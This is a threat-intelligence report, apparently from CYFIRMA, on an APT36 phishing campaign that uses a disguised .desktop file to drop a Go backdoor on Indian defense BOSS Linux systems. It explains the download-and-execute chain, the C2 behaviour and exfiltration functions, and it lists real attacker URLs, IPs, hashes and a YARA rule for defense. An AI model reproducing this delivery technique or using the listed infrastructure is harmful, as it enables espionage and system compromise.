Self Assessment

Phishing Attack : Deploying Malware on Indian Defense BOSS Linux

Published On : 2025-07-04
Share :
Phishing Attack : Deploying Malware on Indian Defense BOSS Linux

Executive Summary

CYFIRMA has identified a sophisticated cyber-espionage campaign orchestrated by APT36 (also known as Transparent Tribe), a threat actor based in Pakistan. This campaign specifically targets personnel within the Indian defense sector. In a notable shift from previous methodologies, APT36 has adapted its tactics to focus on Linux-based environments, with a particular emphasis on systems running BOSS Linux, a distribution extensively utilized by Indian government agencies.

The attack vector involves the dissemination of phishing emails containing a ZIP file attachment that houses a malicious .desktop file, which serves as a Linux shortcut. Upon execution by the victim, the file triggers a dual-action mechanism: it downloads and opens a legitimate PowerPoint (.pptx) file to create a facade of authenticity and divert the user’s attention, while simultaneously downloading and executing a malicious ELF (Executable and Linkable Format) binary in the background. This ELF file acts as the primary payload, designed to compromise the host system and facilitate unauthorized access.

This multi-stage approach is intended to bypass user suspicion and evade traditional security measures, enabling threat actors to gain persistent access to sensitive environments. The deployment of Linux-specific malware signifies a noteworthy advancement in APT36’s operational capabilities and highlights the increasing risk posed to critical government and defense infrastructure.

Considering this development, organizations, particularly those operating within the public sector and utilizing Linux-based systems, are strongly advised to treat this threat as a matter of high priority and to implement robust cybersecurity controls and threat detection mechanisms to mitigate potential risks.

Introduction

In today’s complex cyber threat landscape, nation-state actors such as APT36, also known as Transparent Tribe, pose significant risks to national security. The group has consistently targeted India’s defense and government sectors through sophisticated cyber-espionage campaigns aimed at data theft and long-term access.

Recent developments show a shift in APT36’s tactics toward Linux-based platforms, particularly BOSS Linux, widely used by Indian government agencies. Using phishing emails with ZIP files containing malicious .desktop files, the group deploys a decoy PowerPoint while secretly installing a harmful ELF binary. This highlights the urgent need for stronger email security, user awareness, and continuous threat intelligence monitoring.

Target Technologies BOSS Operating System
Threat Type Phishing Campaign
Written In GO Language
File Types ELF (Executable and Linkable Format)
Key Malware Identifiers Cyber-Security-Advisory.desktop, Cyber-Security-Advisory.ppt and BOSS.elf
Observed First 2025-06-07
Impact Data Exfiltration
MD5 Hashes Cyber-Security-Advisory.desktop
“6eb04445cad300c2878e8fbd3cb60b52”
BOSS.elf “18cf1e3be0e95be666c11d1dbde4588e”

Malware Campaign Attack Flow

In this campaign, the group distributes phishing emails containing an Archive file named “Cyber-Security-Advisory.zip”.

When opened, it contains a .desktop file named “Cyber-Security-Advisory.desktop” (Linux shortcut file).

“.desktop” shortcut file working
The “.desktop” shortcut file contains a sequence of commands embedded within its execution line, which are executed in order when the file is launched. These commands are designed to run automatically and sequentially.

Type=Application” indicates that the entry is intended to launch an application, ensuring the system executes it rather than opening it as a document or link.

Terminal=false” specifies that no terminal window should open during execution, allowing the process to run silently without alerting the user.

Icon=libreoffice-impress” assigns the LibreOffice Impress icon to the shortcut, enhancing its disguise as a legitimate presentation file.

The Exec line initiates a Bash shell using the bash -c command, allowing the execution of multiple commands in a single line.

The sequence begins by changing the working directory to /tmp, a temporary and universally writable location on the system.

The script uses the curl command to silently download a file named slide.pptx from an attacker-controlled server.

Although the filename suggests it is a legitimate PowerPoint presentation, it is in fact an HTML file containing an <iframe> element.

This iframe loads a seemingly legitimate blog page hosted on the same malicious domain.

When executed, the command [ -s slide.pptx ] checks whether the file exists and is not empty. If the condition is met, the file is opened in LibreOffice Impress in view-only mode. This decoy document serves as a distraction, giving the impression of authenticity and thereby lowering the victim’s suspicion.

While the victim is engaged with this harmless-looking presentation, the script continues its execution in the background. A second curl command is issued to silently download a malicious ELF (Executable and Linkable Format) binary named BOSS.elf, which is saved locally as client.elf.

Once downloaded, the script assigns executable permissions to the binary using the chmod +x command. Subsequently, it executes the binary using nohup, allowing it to run in the background even if the user logs out. All output and error messages are redirected to /dev/null, ensuring that no visible signs of execution are displayed to the user.

This carefully orchestrated sequence enables the attacker to deploy and execute malware without alerting the victim. By combining a visual decoy (the iframe-based HTML document) with covert execution of the payload (the ELF binary), the attacker leverages both social engineering and technical stealth. This multi-stage approach significantly increases the chances of a successful compromise, allowing the attacker to establish persistence on the target system and potentially carry out further espionage or data exfiltration operations without immediate detection.

Domain Analysis
Based on recent threat intelligence and security research, the domain sorlastore.com has been identified as malicious infrastructure actively used in cyber-espionage campaigns attributed to the APT36 (Transparent Tribe) threat group. This domain, along with several associated subdomains, has been leveraged in a range of targeted attacks, particularly against personnel and systems within the Indian defense sector.

The domain sorlastore.com has also been associated with campaigns targeting Windows-based environments, wherein malicious macro-embedded PPAM (PowerPoint Add-in) files are employed.

These campaigns reflect tactics like those observed in Linux-based attacks, utilizing phishing emails that deliver PPAM files crafted to resemble legitimate cybersecurity or defense-related advisories. Upon execution, the embedded macros are designed to connect with domains linked to APT36 infrastructure, including sorlastore.com and its subdomains, to download and execute additional malicious payloads.

Technical Analysis of “client.elf”

Static Analysis

Execution
The malware executes the malicious binary client.elf, allowing it to run either silently in the background or interactively through a visible terminal. This flexibility enables the attacker to operate the malware covertly or observe its behavior directly, depending on their objective.

Reconnaissance
The malware gathers system hostname, CPU, and RAM details to profile the victim’s machine and tailor its malicious actions.

The malware gathers system information by checking the runlevel and inspecting the status of the CUPS service using systemctl. It also lists startup scripts to identify services that could be leveraged for persistence or lateral movement.

Evasion
The malware primarily uses main.junkcalc2 for logging activities such as commands received and sent, connection attempts, successful connections, retries, and handling both byte and string data. This allows the threat actor to monitor and manage the malware’s operations in real-time, facilitating seamless command and control. Additionally, this approach helps the malware evade antivirus detection by minimizing suspicious behaviors and obfuscating its activity patterns.

Data Discovery
It uses Main.getDrives to identify system drives and os.readDir to scan their contents, enabling it to locate and access files for potential exfiltration.

Command and Control
The malware leverages main.loadConfig to retrieve operational settings, including C2 server details (101.99.92[.]182:12520).

main.connectToServer is used to establish a TCP remote connection on port 12520, enabling command execution and data exfiltration.

Furthermore, setKeepAlive and setKeepAlivePeriod functions maintain persistent communication with its command-and-control (C2) server by automatically attempting reconnection every 30 seconds, thereby ensuring continuous access for the attacker.

Collection
The malware leverages the Go-based library “github.com/kbinani/screenshot” to capture images of the victim’s desktop, supporting multiple display configurations. This capability enables the attacker to covertly collect visual information from the compromised system without alerting the user.

Data Exfiltration
For each event, such as startScreenCapture, listDrives, SearchFilesAndSendResults, SendFiles, ExecuteCommand, and sendError, the main.sendResponse function is invoked with appropriate parameters to transmit data to the attacker’s server. This function is capable of handling both string and byte data types, enabling it to perform file-related operations and facilitate communication effectively.

Dynamic Analysis

Upon execution, the malware initiates synchronization and attempts to establish a TCP connection to the IP address 101.99.92.182 on port 12520. As of the date of this analysis, the IP was unreachable, and no further data transmission could be captured. However, it is important to note that the threat actor may reactivate the Command and Control (C2) server at any time, potentially enabling full remote communication and control capabilities.

MITRE ATT&CK Framework

MITRE MAPPING
Tactic ID Technique Name
Initial Access T1566 Phishing
T1566.001 Spear phishing Attachment
Execution T1064 Scripting
Persistence T1543 Create or Modify System Process
T1543.003 Systemd Service
Privilege Escalation T1543 Create or Modify System Process
T1543.002 Systemd Service
Defense Evasion T1036 Masquerading
T1064 Scripting
T1564 Hide Artifacts
T1564.001 Hidden Files and Directories
Discovery T1518 Software Discovery
T1518.001 Security Software Discovery
Command and control T1071 Application Layer Protocol
T1095 Non-Application Layer Protocol
T1105 Ingress Tool Transfer
T1571 Non-Standard Port

Conclusion

APT36’s latest campaign showcases a significant advancement in Linux-targeted malware delivery by combining phishing, social engineering, and stealthy payload execution. Government, defense, and critical infrastructure organizations using BOSS Linux or other Linux-based platforms should treat this threat as a high-priority concern. Implementing layered security measures spanning technical controls, user education, and continuous monitoring is essential to mitigate the risk of compromise and to defend against future, increasingly sophisticated campaigns.

Recommendations and Mitigation

Based on the comprehensive analysis of the APT36 campaign targeting Indian defense personnel through phishing emails and disguised malware, CYFIRMA recommends the following mitigation strategies, specifically tailored for the Indian defense sector:
Strengthening Email Security Infrastructure

1. Email Security Enhancements

  • Implement advanced email filtering to detect and block phishing attempts, especially those containing .desktop files, ZIP archives, and executable content.
  • Disable execution of email attachments by default, unless explicitly verified.
  • Use sandboxing to automatically detonate and analyze attachments in a controlled environment before delivery to users.

2. User Awareness and Training

  • Conduct regular cybersecurity awareness training focused on phishing tactics, social engineering, and suspicious file types (e.g., .desktop, .elf, .pptx from unknown sources).
  • Encourage a zero-trust mindset, where users are trained not to open unsolicited attachments or click on unknown links, especially in government and defense environments.

3. System Hardening

  • Restrict execution permissions on directories like /tmp to limit the ability of malware to execute from writable paths.
  • Disable or limit support for .desktop files in email clients and file managers unless they come from trusted sources.
  • Implement application whitelisting to prevent unauthorized applications (such as unknown ELF binaries) from running.

4. Network and Endpoint Monitoring

  • Deploy EDR (Endpoint Detection and Response) tools capable of detecting Linux threats, unauthorized process execution, and unusual network behavior.
  • Monitor outbound traffic for unusual or unauthorized connections to suspicious domains (e.g., sorlastore.com) that may indicate malware beaconing or payload delivery.
  • Use network segmentation to limit the spread of malware within critical systems and infrastructure.

5. Threat Intelligence Integration

  • Incorporate threat intelligence feeds into your SIEM or detection systems to flag known Indicators of Compromise (IOCs), such as:
  • Malicious files:
  • Cyber-Security-Advisory.desktop – MD5: 6eb04445cad300c2878e8fbd3cb60b52
  • BOSS.elf – MD5: 18cf1e3be0e95be666c11d1dbde4588e
  • Malicious domains:
  • https://govin.sorlastore.com
  • Hunt for known APT36 TTPs (Tactics, Techniques, and Procedures) using MITRE ATT&CK mapping to identify related activity.

6. System and Application Patching

  • Ensure BOSS Linux systems and all open-source applications (like LibreOffice, curl, etc.) are up to date with the latest security patches to reduce exploitation vectors.

7. File and Process Behavior Controls

  • Use behavior-based detection rules to flag suspicious use of tools like curl, chmod, and nohup, especially when chained together in scripts or .desktop files.
  • Block execution of unknown binaries downloaded via scripts unless verified and signed by the organization.

Maintain alignment with CYFIRMA’s threat intelligence sharing platform to proactively detect emerging Tactics, Techniques, and Procedures (TTPs), improve situational awareness, and facilitate timely mitigation of threats specific to your sector and geographic region.

Utilize YARA rules and Indicators of Compromise (IOCs) provided by CYFIRMA to strengthen the detection of malicious files and anomalous behavior. Integrate and regularly update these indicators within your Security Information and Event Management (SIEM) platform to support effective file integrity monitoring and behavioral analysis.

Indicators of Compromise

Kindly refer to the IOCs section, applying relevant security controls.

S. No. Indicator Remarks
1 608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a Block
2 ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab Block
3 e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064 Block
4 167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f Block
5 https://govin.sorlastore[.]com/uploads/Cyber-Security-Advisory.pptx Block
6 https://govin.sorlastore[.]com/uploads/BOSS.elf Block
7 sorlastore[.]com Block
8 http://169.254.169[.]254/latest/meta-data/ami-id Monitor
9 169.254.169[.]254 Monitor
10 101.99.92[.]182 Monitor
11 modgovin.onthewifi[.]com Monitor

YARA Rules

rule APT36_Sorlastore_PPAM_and_ELF
{
meta:
description = “Detects APT36 campaign artifacts: slide.pptx, BOSS.elf, govin.sorlastore domain activity”
author = “CYFIRMA Researcher”
date = “2025-07-03”
threat_actor = “APT36 / Transparent Tribe”

strings:
// File hashes (SHA256)
$hash1 = “608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a”
$hash2 = “ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab”
$hash3 = “e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064”
$hash4 = “167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f”

// URLs
$dom1 = “sorlastore.com”
$ip1 = “101.99.92.182”
$ip2 = “169.254.169.254”
$dom2 = “onthewifi.com”

condition:
any of ($hash*) or
any of ($dom*) or
any of ($ip*)
}